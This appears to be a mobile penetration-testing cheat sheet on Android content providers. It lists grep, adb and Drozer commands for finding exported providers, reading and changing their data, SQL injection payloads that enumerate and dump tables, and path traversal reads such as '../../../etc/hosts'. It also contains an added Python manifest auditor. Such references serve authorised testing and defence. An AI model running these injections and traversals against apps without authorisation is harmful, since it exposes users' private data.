Content providers
Finding exported content providers
# AndroidManifest.xml
## explicitly
grep "<provider" app-decompiled/AndroidManifest.xml | grep "android:exported=\"true\""
## implicitly
grep "<intent-filter" -B 1 app-decompiled/AndroidManifest.xml | grep "<provider" | grep --invert-match "android:exported="
# Drozer
run app.provider.info -a <app-package-name>
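An added example (not part of the original page): a Python manifest audit that parses the XML instead of grepping it, so multi-line `<provider>` tags are handled, and that applies the platform default for a missing `android:exported` (exported when minSdkVersion or targetSdkVersion is 16 or lower). The sample manifest, `audit_providers` and `sdk_level` are hypothetical names introduced here.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
# Constructed sample manifest; package and provider names are hypothetical.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="16"/>
  <application>
    <provider android:name=".NotesProvider"
        android:authorities="com.example.notes.provider"
        android:exported="true"/>
    <provider android:name=".LegacyProvider"
        android:authorities="com.example.notes.legacy"/>
    <provider android:name=".GuardedProvider"
        android:authorities="com.example.notes.guarded"
        android:exported="true"
        android:readPermission="com.example.notes.READ"/>
    <provider android:name=".PrivateProvider"
        android:authorities="com.example.notes.private"
        android:exported="false"/>
  </application>
</manifest>"""

def audit_providers(manifest_xml, sdk_level=None):
    """Return one finding per provider that other apps can reach."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    if sdk_level is None and sdk is not None:
        # apktool can move these values to apktool.yml; pass sdk_level then.
        vals = [sdk.get(ANDROID + k) for k in ("minSdkVersion", "targetSdkVersion")]
        sdk_level = min((int(v) for v in vals if v), default=None)
    findings = []
    for p in root.iter("provider"):
        exported = p.get(ANDROID + "exported")
        if exported == "false":
            continue
        # No attribute: exported by default only when min/target SDK <= 16.
        # An unknown SDK level is treated as 17+ (assumption of this example).
        if exported is None and (sdk_level is None or sdk_level > 16):
            continue
        perms = [p.get(ANDROID + k)
                 for k in ("permission", "readPermission", "writePermission")]
        findings.append({
            "name": p.get(ANDROID + "name"),
            "authorities": p.get(ANDROID + "authorities"),
            "exported": "explicit" if exported else "implicit default",
            "unprotected": not any(perms),
        })
    return findings
```

`unprotected` is true only when no permission attribute is set at all; a provider that declares only `android:readPermission` still leaves writes open and should be reviewed.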
Obtaining content provider URIs
# Drozer
run app.provider.finduri <app-package-name>
run scanner.provider.finduris -a <app-package-name>
General interaction with content providers
Android Debug Bridge (adb)
# General
adb shell content <command> --uri <uri> <parameters>
# Select
adb shell content query --uri <uri>
adb shell content query --uri <uri> --projection <column-name>
adb shell content query --uri <uri> --where <column-name>=<column-value>
adb shell content query --uri <uri> --where "<column-name>=\'<column-value>\'"
# Insert
adb shell content insert --uri <uri> --bind <column-name>:<column-type>:<column-value>
# Delete
adb shell content delete --uri <uri>
adb shell content delete --uri <uri> --where <column-name>=<column-value>
# Update
adb shell content update --uri <uri> --bind <column-name>:<column-type>:<column-value> --where <column-name>=<column-value>
# Read file
adb shell content read --uri <uri>/<file>
# Download file
adb shell content read --uri <uri>/<file> > <file>
Drozer
# Select
run app.provider.query <uri>
run app.provider.query <uri> --projection <column-name>
run app.provider.query <uri> --selection <column-name>=<column-value>
run app.provider.query <uri> --selection <column-name>=\'<column-value>\'
# Insert
run app.provider.insert <uri> --<column-type> <column-name> <column-value>
run app.provider.insert <uri> --string <column-name> <column-value> --integer <column-name> <column-value>
# Delete
run app.provider.delete <uri>
run app.provider.delete <uri> --selection <column-name>=<column-value>
run app.provider.delete <uri> --selection <column-name>=\'<column-value>\'
# Update
run app.provider.update <uri> --selection <column-name>=<column-value> --<column-type> <column-name> <column-value>
# Read file
run app.provider.read <uri>/<file>
# Download file
run app.provider.download <uri>/<file> .
SQL injection (SQLi)
Identifying SQLi.
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "\'"
# Drozer
run scanner.provider.injection -a <app-package-name>
run app.provider.query <uri> --projection "'"
run app.provider.query <uri> --selection "'"
Enumerating tables.
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ SQLITE_MASTER\ WHERE\ type=\'table\'\;--"
# Drozer
run scanner.provider.sqltables -a <app-package-name>
run app.provider.query <uri> --projection "* FROM SQLITE_MASTER WHERE type='table';--"
Retrieving data from a table.
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ <table>\;--"
# Drozer
run app.provider.query <uri> --projection "* FROM <table>;--"
Path traversal
Identifying path traversal.
# Drozer
run scanner.provider.traversal -a <app-package-name>
Reading a file.
# Android Debug Bridge (adb)
adb shell content read --uri <uri>/<file>
adb shell content read --uri <uri>/../../../<file>
adb shell content read --uri <uri>/../../../etc/hosts
# Drozer
run app.provider.read <uri>/<file>
run app.provider.read <uri>/../../../<file>
run app.provider.read <uri>/../../../etc/hosts